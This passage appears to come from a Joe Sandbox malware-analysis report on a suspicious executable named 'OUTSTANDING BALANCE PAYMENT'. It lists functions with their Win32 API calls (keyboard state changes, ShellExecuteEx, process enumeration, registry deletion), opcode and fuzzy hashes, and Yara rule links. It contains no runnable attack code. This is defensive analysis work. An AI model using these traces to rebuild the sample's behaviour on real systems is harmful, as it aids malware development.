                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 002E8F8A
                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002E8FAA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 3864802216-0
                                                                  • Opcode ID: 59359a96824bf1e3ee7a5b3a6edadb4d7b97a49a4cf2a510b87078627b2a9dc7
                                                                  • Instruction ID: 2326f4201fc0629891aedc37dbd5f41e2d5d627261a76e0db8f6cf0f283ea602
                                                                  • Opcode Fuzzy Hash: 59359a96824bf1e3ee7a5b3a6edadb4d7b97a49a4cf2a510b87078627b2a9dc7
                                                                  • Instruction Fuzzy Hash: C031AE72241214BFEB118F95CC5AFEB3BADEF49711F484065FE48DA191CAB69841CB70
                                                                  Function 002F0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 002F016D
                                                                  • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 002F038D
                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002F03AB
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?), ref: 002F03D6
                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002F03FF
                                                                  • ShowWindow.USER32(00000003,00000000), ref: 002F0421
                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 002F0440
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                  • String ID:
                                                                  • API String ID: 3356174886-0
                                                                  • Opcode ID: 06cfe18315a33bccc3ded519cf26d4e7809a05cedf4f9d8a51187e21b21e3712
                                                                  • Instruction ID: cbc110fff578216640665fda1b466afaf8ccdde20161fe742c31bf7a96f10c82
                                                                  • Opcode Fuzzy Hash: 06cfe18315a33bccc3ded519cf26d4e7809a05cedf4f9d8a51187e21b21e3712
                                                                  • Instruction Fuzzy Hash: B4A1BF3561061AEBDB18CF68C9C57BDFBB1BF08780F048165EE54AB291D774AD60CB90
                                                                  Function 0029AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c810096e6b54d933945fccee703dfe8ad4daab8bb12056566b3f04c7c2d7b436
                                                                  • Instruction ID: d143d6aae378b0085cc327d90e185eec36332540da40e8de070d0a4652a68627
                                                                  • Opcode Fuzzy Hash: c810096e6b54d933945fccee703dfe8ad4daab8bb12056566b3f04c7c2d7b436
                                                                  • Instruction Fuzzy Hash: 79717E71910209EFCF15CF98CC49ABEBB78FF85314F248159F915AA251C771AA21CFA1
                                                                  Function 002E2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002E225A
                                                                  • _memset.LIBCMT ref: 002E2323
                                                                  • ShellExecuteExW.SHELL32(?), ref: 002E2368
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                    • Part of subcall function 0029C6F4: _wcscpy.LIBCMT ref: 0029C717
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002E242F
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 002E243E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                  • String ID: @
                                                                  • API String ID: 4082843840-2766056989
                                                                  • Opcode ID: 65ecc29cc9488e4c94095bfe4dcd099c466e01f5a5761906dc84c20c0fa902c6
                                                                  • Instruction ID: 1211347e585836156d645b401e60aad06837416b2db231052e8d0b1734819d53
                                                                  • Opcode Fuzzy Hash: 65ecc29cc9488e4c94095bfe4dcd099c466e01f5a5761906dc84c20c0fa902c6
                                                                  • Instruction Fuzzy Hash: 78715975A20619DFCF05EFA5C8819AEB7B9FF48310F108059E856AB291CB34AD64CF90
                                                                  Function 002C3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 002C3DE7
                                                                  • GetKeyboardState.USER32(?), ref: 002C3DFC
                                                                  • SetKeyboardState.USER32(?), ref: 002C3E5D
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 002C3E8B
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 002C3EAA
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 002C3EF0
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002C3F13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 84d70a7d5abd0cd8d55ff27c3edf51d838884aa90d888a202428a07f001c42b1
                                                                  • Instruction ID: 8d4971813e89d3794810effc6481b657efab23792d56566db6a77ab3812c2432
                                                                  • Opcode Fuzzy Hash: 84d70a7d5abd0cd8d55ff27c3edf51d838884aa90d888a202428a07f001c42b1
                                                                  • Instruction Fuzzy Hash: 8B5103A0A247D63DFB368A248C05FB67EA95F06304F088E8DE0D9468C2D3D49EE4D760
                                                                  Function 002C3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 002C3C02
                                                                  • GetKeyboardState.USER32(?), ref: 002C3C17
                                                                  • SetKeyboardState.USER32(?), ref: 002C3C78
                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002C3CA4
                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002C3CC1
                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002C3D05
                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002C3D26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: dc0fb79eda9d552f8326e426a4cac4f013cb14fa6130cbead3ca28f1e4154769
                                                                  • Instruction ID: da6f40458cfc20b93a9f0c6f3a3546b1e1f65237acf3591af58785493645b441
                                                                  • Opcode Fuzzy Hash: dc0fb79eda9d552f8326e426a4cac4f013cb14fa6130cbead3ca28f1e4154769
                                                                  • Instruction Fuzzy Hash: E35126A05247D63DFB32DB248C15FBABF986B06304F0CCA8DE0DA564C2D695EEA4D750
                                                                  Function 002C7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsncpy$LocalTime
                                                                  • String ID:
                                                                  • API String ID: 2945705084-0
                                                                  • Opcode ID: 927b16fe917e7514dd02f0d6cf81b3e8262d250e138fe403f5c4b2e8a6462215
                                                                  • Instruction ID: 127cb8d55771cc5836c4f7e469de5756e61c74bd486d0698c90fad15da09673d
                                                                  • Opcode Fuzzy Hash: 927b16fe917e7514dd02f0d6cf81b3e8262d250e138fe403f5c4b2e8a6462215
                                                                  • Instruction Fuzzy Hash: 2C415466D24214B7DF10EBF4C886ACFB7AD9F06720F504966E514E3121FA34D6348BA5
                                                                  Function 002E3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 002E3DA1
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002E3DCB
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 002E3E80
                                                                    • Part of subcall function 002E3D72: RegCloseKey.ADVAPI32(?), ref: 002E3DE8
                                                                    • Part of subcall function 002E3D72: FreeLibrary.KERNEL32(?), ref: 002E3E3A
                                                                    • Part of subcall function 002E3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002E3E5D
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 002E3E25
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                  • String ID:
                                                                  • API String ID: 395352322-0
                                                                  • Opcode ID: 0cb3fc23daa23fff2d8a876a6e269f4a856ab5357982e66c923c8c9279bcd9c6
                                                                  • Instruction ID: 7fc7c26a22497f746159b238825dd49b953825e0dab28bbf34f99aee0d79f012
                                                                  • Opcode Fuzzy Hash: 0cb3fc23daa23fff2d8a876a6e269f4a856ab5357982e66c923c8c9279bcd9c6
                                                                  • Instruction Fuzzy Hash: C93137B1951109BFDB15CFD1DC89AFFB7BCEF08301F44016AA512A3150DA709F988AA0
                                                                  Function 002E8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002E8FE7
                                                                  • GetWindowLongW.USER32(011F82B0,000000F0), ref: 002E901A
                                                                  • GetWindowLongW.USER32(011F82B0,000000F0), ref: 002E904F
                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002E9081
                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002E90AB
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 002E90BC
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002E90D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 2178440468-0
                                                                  • Opcode ID: d7b94253091e49df9099b2f13ef28cd29ba345b78294738a6b1ce0d50a9f7282
                                                                  • Instruction ID: 3f4b1def1a498d38364dc413e84a70dabf215ebabf85b477d3b89966eb93c802
                                                                  • Opcode Fuzzy Hash: d7b94253091e49df9099b2f13ef28cd29ba345b78294738a6b1ce0d50a9f7282
                                                                  • Instruction Fuzzy Hash: F73157742A02569FDB228F59DC84F6573A9FB4A314F950166F9088F2B2CB72A890CF40
                                                                  Function 002C08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C08F2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C0918
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 002C091B
                                                                  • SysAllocString.OLEAUT32(?), ref: 002C0939
                                                                  • SysFreeString.OLEAUT32(?), ref: 002C0942
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 002C0967
                                                                  • SysAllocString.OLEAUT32(?), ref: 002C0975
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 52e74c52da79e249baac5f6745d6baf17bb10bc87197689c7c3da0aced5e05b4
                                                                  • Instruction ID: 601f8e6e1297467439d75d837f24115063fda6c6c5af3e2245705c8c2270f798
                                                                  • Opcode Fuzzy Hash: 52e74c52da79e249baac5f6745d6baf17bb10bc87197689c7c3da0aced5e05b4
                                                                  • Instruction Fuzzy Hash: D6219576611219AFEF109FA8DCC8EBB73ECEB09760B408626F915DB151DA70EC458B60
                                                                  Function 002C2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                  • API String ID: 1038674560-2734436370
                                                                  • Opcode ID: 446858065ed530277f3e1c7248c42f76ad4ff2a3f02aa25562e219067004cf2d
                                                                  • Instruction ID: cb81977ee608231f8b8a2bf0f082e69b32370f48179bcc8e0ecb65d985ccc846
                                                                  • Opcode Fuzzy Hash: 446858065ed530277f3e1c7248c42f76ad4ff2a3f02aa25562e219067004cf2d
                                                                  • Instruction Fuzzy Hash: 64216A32130222A7D739BA249C12FB7739CEF65350FA0412DF445A7081EEA59975C3A0
                                                                  Function 002C0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C09CB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002C09F1
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 002C09F4
                                                                  • SysAllocString.OLEAUT32 ref: 002C0A15
                                                                  • SysFreeString.OLEAUT32 ref: 002C0A1E
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 002C0A38
                                                                  • SysAllocString.OLEAUT32(?), ref: 002C0A46
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 344154a3562d1fb11fb575260108f360bd8fa8c1e3c21aa8044b03febc09a382
                                                                  • Instruction ID: 24192181e12136473bf7a84af78c906d5fcb23ea312f092bf37a9ba5fc55bdb2
                                                                  • Opcode Fuzzy Hash: 344154a3562d1fb11fb575260108f360bd8fa8c1e3c21aa8044b03febc09a382
                                                                  • Instruction Fuzzy Hash: 1D214775611205AFDB109FE9DCC9D6B77ECEF08360B408225FA09CB161DA70EC518B54
                                                                  Function 002EA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0029D1BA
                                                                    • Part of subcall function 0029D17C: GetStockObject.GDI32(00000011), ref: 0029D1CE
                                                                    • Part of subcall function 0029D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0029D1D8
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002EA32D
                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002EA33A
                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002EA345
                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002EA354
                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002EA360
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                  • String ID: Msctls_Progress32
                                                                  • API String ID: 1025951953-3636473452
                                                                  • Opcode ID: fbec373a170303ef97cba6449631209c0b4424ed8fec9d2bbce56b5c76d9d2e0
                                                                  • Instruction ID: 81de5f5590e124ae2249c30546b77b4115b8da568f7f4939b72ed65c5b1fe3d8
                                                                  • Opcode Fuzzy Hash: fbec373a170303ef97cba6449631209c0b4424ed8fec9d2bbce56b5c76d9d2e0
                                                                  • Instruction Fuzzy Hash: 5A1190B115021DBEEF115FA1CC85EEB7F6DFF09798F014115FA08A60A0C672AC21DBA4
                                                                  Function 0029CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 0029CCF6
                                                                  • GetWindowRect.USER32(?,?), ref: 0029CD37
                                                                  • ScreenToClient.USER32(?,?), ref: 0029CD5F
                                                                  • GetClientRect.USER32(?,?), ref: 0029CE8C
                                                                  • GetWindowRect.USER32(?,?), ref: 0029CEA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$Window$Screen
                                                                  • String ID:
                                                                  • API String ID: 1296646539-0
                                                                  • Opcode ID: 8cf969d2be2656c7e9b229ba3e008174bbde56b0ec22512071351c2ec6a01fe5
                                                                  • Instruction ID: db5fbfa201b1d8f072b22f101359949a1a5112747886f25f99c3071a47988bdf
                                                                  • Opcode Fuzzy Hash: 8cf969d2be2656c7e9b229ba3e008174bbde56b0ec22512071351c2ec6a01fe5
                                                                  • Instruction Fuzzy Hash: 25B1627992024ADBDF14CFA8C5807EDB7B1FF08340F249529ED99EB254DB70A960CB64
                                                                  Function 002E1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 002E1C18
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 002E1C26
                                                                  • __wsplitpath.LIBCMT ref: 002E1C54
                                                                    • Part of subcall function 002A1DFC: __wsplitpath_helper.LIBCMT ref: 002A1E3C
                                                                  • _wcscat.LIBCMT ref: 002E1C69
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 002E1CDF
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 002E1CF1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
